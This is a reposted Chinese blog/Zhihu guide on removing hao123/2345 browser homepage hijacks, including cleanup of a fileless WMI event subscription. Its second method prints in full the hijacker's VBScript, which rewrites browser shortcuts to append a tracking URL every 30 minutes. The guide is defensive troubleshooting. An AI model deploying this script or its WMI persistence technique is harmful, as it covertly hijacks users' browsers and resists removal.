被hao123劫持主页最佳解决办法

作者:田无法
链接:https://www.zhihu.com/question/39881858/answer/159582643
来源:知乎
著作权归作者所有。商业转载请联系作者获得授权,非商业转载请注明出处。

被hao123劫持主页最佳解决办法


方法一

下载360卫士,然后使用其主页劫持工具,可以恢复,但是还没结束,如果这是你高高兴兴地删除360,等第二次打开电脑时,又会出现主页被可恶的123hao劫持的情况,彻底解决问题的办法是,在C:\Windows\System32\wbem\scrcons.exe这个文件中,找到删除scrcons.exe这个文件,他才是罪大恶极的祸端,然后你会发现删除不了,这是还是我们伟大的360卫士来帮忙,打开360卫士的文件粉碎机,把找到的scrcons.exe直接拖进去,OK,123hao劫持主页完美解决,可以感谢并删除360卫士了

方法二

考虑到可能加载了启动项,在注册表、启动项、服务等中均未查找到相关信息,重启后IE快捷方式被重新篡改。尝试了事件查看器和任务计划,均未在里面查出任何信息。 之后又安装了超级兔子、360、exterminateit等工具进行检查,也未检出。 打开ProcessMonitor进行监视,发现每隔30分钟出现一个scrcons.exe进程自动启动并修改快速启动栏的命令,然后自动关闭(幸亏是30分钟一次,你要是24小时一次,那我就杯具了…),修改Win7下opera快速启动图标路径类似如下: C:\Users\iefans\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Opera12.01 1532.lnk 查找资料,发现这应该是一个通过WMI发起的定时自动运行脚本。要查看WMI事件,到以下地址下载WMITool并安装http://www.microsoft.com/en-us/download/details.aspx?id=24045 安装后打开WMI event viewer,点击左上角register for events,弹出Connect to namespace框,填入“root\subscription”,确定,出现下图: 点击左侧_EventFilter:Name="unown_filter",再至右侧右键点击ActiveScriptEventConsume r Name="unown",选择view instant properties,如下图: 查看ScriptText项可知,这是一段VBScript调用系统服务间隔30分钟执行一次,将所有浏览器调用加上“http://www.2345.com/?kunown”!抓住你了~!隐藏的够深,没常驻进程,没有文件(把自己存储在WMI数据库中)。 受到影响的浏览器有(各色浏览器,差不多齐了): "IEXPLORE.EXE", "chrome.exe", "firefox.exe", "360chrome.exe", "360SE.exe", "SogouExplorer.exe", "opera.exe", "Safari.exe", "Maxthon.exe", "TTraveler.exe", "TheWorld.exe", "baidubrowser.exe", "liebao.exe", "QQBrowser.exe" 具体代码如下:On Error Resume Next:Const link = "http://www.2345.com/?kunown":browsers = Array("IEXPLORE.EXE", "chrome.exe", "firefox.exe", "360chrome.exe", "360SE.exe", "SogouExplorer.exe", "opera.exe", "Safari.exe", "Maxthon.exe", "TTraveler.exe", "TheWorld.exe", "baidubrowser.exe", "liebao.exe", "QQBrowser.exe"):Set oDic = CreateObject("scripting.dictionary"):For Each browser In browsers:oDic.Add LCase(browser), browser:Next:Set fso = CreateObject("Scripting.Filesystemobject"):Set WshShell = CreateObject("Wscript.Shell"):strDesktop = "C:\Users\Gemini\Desktop":strAllUsersDesktop = WshShell.SpecialFolders("AllUsersDesktop"):QuickLaunch = "C:\Users\Gemini\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch":UserPinnedStartMenu = QuickLaunch & "\User Pinned\StartMenu":UserPinnedTaskBar = QuickLaunch & "\User Pinned\TaskBar":For Each file In fso.GetFolder(strDesktop).Files:If LCase(fso.GetExtensionName(file.Path)) = "lnk" Then:set oShellLink = WshShell.CreateShortcut(file.Path):path = oShellLink.TargetPath:name = fso.GetBaseName(path) & "." & fso.GetExtensionName(path):If oDic.Exists(LCase(name)) Then:oShellLink.Arguments = link:If file.Attributes And 1 Then:file.Attributes = file.Attributes - 1:End If:oShellLink.Save:End If:End If:Next:For Each file In fso.GetFolder(strAllUsersDesktop).Files:If LCase(fso.GetExtensionName(file.Path)) = "lnk" Then:set oShellLink = WshShell.CreateShortcut(file.Path):path = oShellLink.TargetPath:name = fso.GetBaseName(path) & "." & fso.GetExtensionName(path):If oDic.Exists(LCase(name)) Then:oShellLink.Arguments = link:If file.Attributes And 1 Then:file.Attributes = file.Attributes - 1:End If:oShellLink.Save:End If:End If:Next:If fso.FolderExists(QuickLaunch) Then:For Each file In fso.GetFolder(QuickLaunch).Files:If LCase(fso.GetExtensionName(file.Path)) = "lnk" Then:set oShellLink = WshShell.CreateShortcut(file.Path):path = oShellLink.TargetPath:name = fso.GetBaseName(path) & "." & fso.GetExtensionName(path):If oDic.Exists(LCase(name)) Then:oShellLink.Arguments = link:If file.Attributes And 1 Then:file.Attributes = file.Attributes - 1:End If:oShellLink.Save:End If:End If:Next:End If:If fso.FolderExists(UserPinnedStartMenu) Then:For Each file In fso.GetFolder(UserPinnedStartMenu).Files:If LCase(fso.GetExtensionName(file.Path)) = "lnk" Then:set oShellLink = WshShell.CreateShortcut(file.Path):path = oShellLink.TargetPath:name = fso.GetBaseName(path) & "." & fso.GetExtensionName(path):If oDic.Exists(LCase(name)) Then:oShellLink.Arguments = link:If file.Attributes And 1 Then:file.Attributes = file.Attributes - 1:End If:oShellLink.Save:End If:End If:Next:End If:If fso.FolderExists(UserPinnedTaskBar) Then:For Each file In fso.GetFolder(UserPinnedTaskBar).Files:If LCase(fso.GetExtensionName(file.Path)) = "lnk" Then:set oShellLink = WshShell.CreateShortcut(file.Path):path = oShellLink.TargetPath:name = fso.GetBaseName(path) & "." & fso.GetExtensionName(path):If oDic.Exists(LCase(name)) Then:oShellLink.Arguments = link:If file.Attributes And 1 Then:file.Attributes = file.Attributes - 1:End If:oShellLink.Save:End If:End If:Next:End If 最后,清除方法:在WMI event viewer中将“_EventFilter:Name="unown_filter"”项目右键删除! 删不掉? 到WMITool安装路径(例如:C:\Program Files (x86)\WMI Tools)下,右键点击wbemeventviewer.exe,选择以管理员身份运行!删之! 还没完,还要手动将快速启动栏中,将各个浏览器快捷命令中的http://www.2345.com/?kunown去掉! 暂时就这么多了,还有没有其它影响的话,用用再看吧! 解决方法来自:Gemini 希望大家能够把这解决方法普及开来,现在大多人还是用修改快捷方式之类的解决方案,已经落伍了... 原文出处: http://www.iefans.net/ie-zhuye-jiechi-www-2345-com-kunown

 

 

 

主页被劫持的情况经常出现,有的是装了流氓软件被改主页,有的是用windows激活软件等被改主页,收集了几个解决办法:

1、检查chrome和IE等图标,右键属性-快捷方式- 目标 如果是这样的“C:\Program Files (x86)\Google\Chrome\Application\chrome.exe” www.hao123.com 把后面的删除就可以了

2、看下目录下的chrome是否启动方式后缀名加了hao123 Start Menu下的 C:\ProgramData\Microsoft\Windows\Start Menu\Programs

3、任务栏下的图标,有一次发现就是任务栏下的被改了 ,目录如下 
C:\Users\你的电脑名\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar 
右键查看属性,若目标后面有hao123删了就行了

4、运行msconfig,找到系统自启动项,禁用陌生的自启动项。都陌生的,请禁用全部自启动项,如果解决了再一次解禁一部分自启动项来定位有问题的自启动项。

5、运行taskschd.msc打开任务计划程序,定位问题方法同上。

 

 

今天研究(翻,墙),装了几个插件,什么云帆、外遇、蓝灯

后来我的google浏览器被hao123劫持,百度浏览器被hao524劫持

删除浏览器快捷方式、属性目标里的后缀,过不多久又被劫持,把我搞毛了

弄了一晚上,发现是wmi脚本被篡改,写入了恶意代码

 

解决办法:

1、修改快捷方式、在快捷方式上右击属性对话框手工删除网址的部分

2、加载了启动项的,在注册表、启动项、服务中搜索相关网址信息,找到后删除

3、使用wmitools工具删除wmi恶意代码

wmitools下载地址:https://pan.baidu.com/s/1bo7GQvH

修改步骤如下:

① 安装wmitools后,进入安装路径,右键管理员运行wbemeventviewer.exe

                         

 ②单击左上角的钢笔符号

                            被hao123劫持主页最佳解决办法_第1张图片

③弹出对话框内容默认为:root\CIMV2 ,点击ok按钮

                            被hao123劫持主页最佳解决办法_第2张图片

④接下来弹出的对话框再次点击ok按钮:

                            被hao123劫持主页最佳解决办法_第3张图片

⑤窗口中出现_EventFilter,操作如下:

                          被hao123劫持主页最佳解决办法_第4张图片

⑥恶意代码在下面的ScriptText里,我复制到notepad++里,如下:

                          被hao123劫持主页最佳解决办法_第5张图片

   将上面代码复制到notepad++,如下:

                          被hao123劫持主页最佳解决办法_第6张图片

⑦ 按如下操作,删除之:

                          被hao123劫持主页最佳解决办法_第7张图片

⑧完成,关闭工具。

 

      注意:经排查,此问题是由于安装了蓝灯(翻,墙)插件,大家小心了

转载于:https://www.cnblogs.com/xc1234/p/9019168.html

你可能感兴趣的:(被hao123劫持主页最佳解决办法)